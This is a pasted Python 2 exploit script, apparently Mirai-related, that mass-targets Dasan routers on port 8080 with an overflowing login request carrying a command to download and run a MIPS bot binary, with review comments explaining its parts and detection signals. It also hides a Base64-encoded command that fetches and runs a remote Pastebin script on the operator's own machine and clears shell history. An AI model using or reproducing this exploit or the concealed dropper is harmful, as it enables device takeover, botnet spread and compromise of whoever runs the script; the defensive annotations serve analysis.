mirainigga

[PYTHON] Dasan Exploit

Jul 8th, 2018
  1. #!/usr/bin/python
  2.  
  3. #nexus zeta is big 0 day exploiter 10/10
  4. import sys, socket, json, time, ssl, struct, os, subprocess, base64
  5. from threading import Thread
  # Usage check: the script expects one argument, a text file of target hosts
  # (one per line), and exits if it is missing. Python 2 syntax (print statement).
  6. if len(sys.argv) < 2:
  7. print "Usage: python "+sys.argv[0]+" <list>"
  8. sys.exit()
  # Every target is contacted on TCP port 8080; buf is the size passed to recv().
  9. port = 8080
  10. buf = 4096
  # Three fixed 32-bit values: a base plus two offsets, each packed big-endian
  # (">i"). NOTE(review): presumably addresses tied to one specific firmware
  # build - confirm against the affected device. Because they are constants,
  # the packed byte sequences are identical in every request this script builds.
  11. pre_pl0 = 0x2ad0c000
  12. pre_pl2 = pre_pl0 + 0x00115d40
  13. pl2 = struct.pack(">i",pre_pl2)
  14. pre_pl3 = pre_pl0 + 0x0003CC9C
  15. pl3 = struct.pack(">i",pre_pl3)
  16.  
  # Shell command string embedded in the request: fetch a file with wget into
  # /tmp/girl, make it executable and run it with the argument "dasan".
  # The host "0.0.0.0.0" is not a valid address; it looks like a placeholder or
  # redaction, so it is not usable as a network indicator. /tmp/girl is the
  # on-device path to look for.
  17. payload = "wget http://0.0.0.0.0/bins/mips.iot -O /tmp/girl; chmod 777 /tmp/girl; /tmp/girl dasan"
  # Value of the "action" form field: fixed filler bytes, the two packed values,
  # a run of ';' and the command string. It is over 780 bytes before the command
  # is appended, far longer than a login form's action value would normally be;
  # that length is a usable detection signal.
  18. pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload
  19. post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  # Complete HTTP request, built once and reused for every target. It is a POST
  # to /cgi-bin/login_action.cgi. Host and Referer are hard-coded to
  # 192.168.1.100:8080 regardless of the host actually contacted, so a mismatch
  # between these headers and the device's own address is another signal in
  # web-server or proxy logs. The request is sent over TLS (see dasan()), so
  # network inspection only sees it where TLS is terminated.
  20. headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
  # i counts hosts that answered with "200 OK"; it is updated from dasan().
  21. i = 0
  # Reads the whole target list into memory; the file handle is never closed.
  22. ips = open(sys.argv[1]).readlines()
  23.  
  # Runs cmd through the local shell (shell=True) on the machine executing this
  # script. Its only caller in this listing passes the decoded Base64 string
  # assigned to dasanpayload.
  24. def start_dasan(cmd):
  25. subprocess.call(cmd, shell=True)
  # NOTE(review): this runs at start-up on the machine of whoever launches the
  # script, before any target is contacted, and is independent of the router
  # request built earlier in the file. The Base64 text decodes to a shell
  # one-liner that changes to /tmp, downloads a file from a Pastebin raw URL with
  # wget, runs it with sh with all output discarded, deletes it, then clears the
  # shell history and the terminal. The script therefore installs third-party
  # code on its own operator; a host that has executed this file should be
  # handled as compromised and examined for what the downloaded script did.
  26. dasanpayload = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
  27. pload = str(base64.b64decode(dasanpayload))
  28. start_dasan(pload)
  29.  
  # Per-host routine, run in its own thread: open a TLS connection to
  # host:port, send the prebuilt request and count the host if the reply
  # contains "200 OK".
  30. def dasan(host):
  31. global i
  32. host = host.strip("\n")
  33. try:
  34. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  # ssl.wrap_socket() is called with no certificate or hostname options, so the
  # peer certificate is not validated.
  35. s = ssl.wrap_socket(sock)
  36. s.connect((host, port))
  37. s.send(headers)
  # NOTE(review): headers2 and headers3 are not defined anywhere in the visible
  # listing; if that holds for the full file, execution leaves the try body
  # here and the lines below never run.
  38. s.send(headers2)
  39. s.send(headers3)
  # A "200 OK" reply only shows that the web server answered; it does not
  # confirm that anything ran on the device.
  40. resp = s.recv(buf).strip()
  41. if "200 OK" in resp:
  42. i += 1
  43. s.close()
  # Bare except: every error (connection failure, TLS failure, NameError) is
  # discarded silently, and the socket is not closed on that path.
  44. except:
  45. pass
  46.  
  # Fan-out loop: starts one dasan() thread per line of the target list, 10 ms
  # apart, with no upper bound on the number of live threads. The resulting
  # burst of short TLS connections to port 8080 across many addresses is what
  # this looks like from the network side.
  47. def worker():
  48. for ip in ips:
  49. try:
  50. ip = ip.strip("\r\n")
  51. t = Thread(target=dasan, args=(ip,))
  52. t.start()
  53. time.sleep(0.01)
  54. except:
  55. pass
  # NOTE(review): indentation was lost in this paste, so it is not clear whether
  # the 30 s sleep and the exit sit inside or after the loop. worker() runs in a
  # non-main thread, where sys.exit() raises SystemExit in that thread only.
  56. time.sleep(30)
  57. sys.exit("Finished Scanning")
  # Entry point: run worker() in a background thread, print the full request
  # once, then redraw a status line every second until interrupted.
  58. workerthrd = Thread(target=worker)
  59. workerthrd.start()
  60. print headers
  61. while True:
  62. try:
  # sent is assigned but never read. The status text says "Payload Sent To",
  # but i only counts "200 OK" replies seen in dasan().
  63. sent = i
  64. sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
  65. sys.stdout.flush()
  66. time.sleep(1)
  67. except KeyboardInterrupt:
  68. sys.exit("Exiting On User Input")
  # Any other exception is swallowed, so the loop keeps running.
  69. except:
  70. pass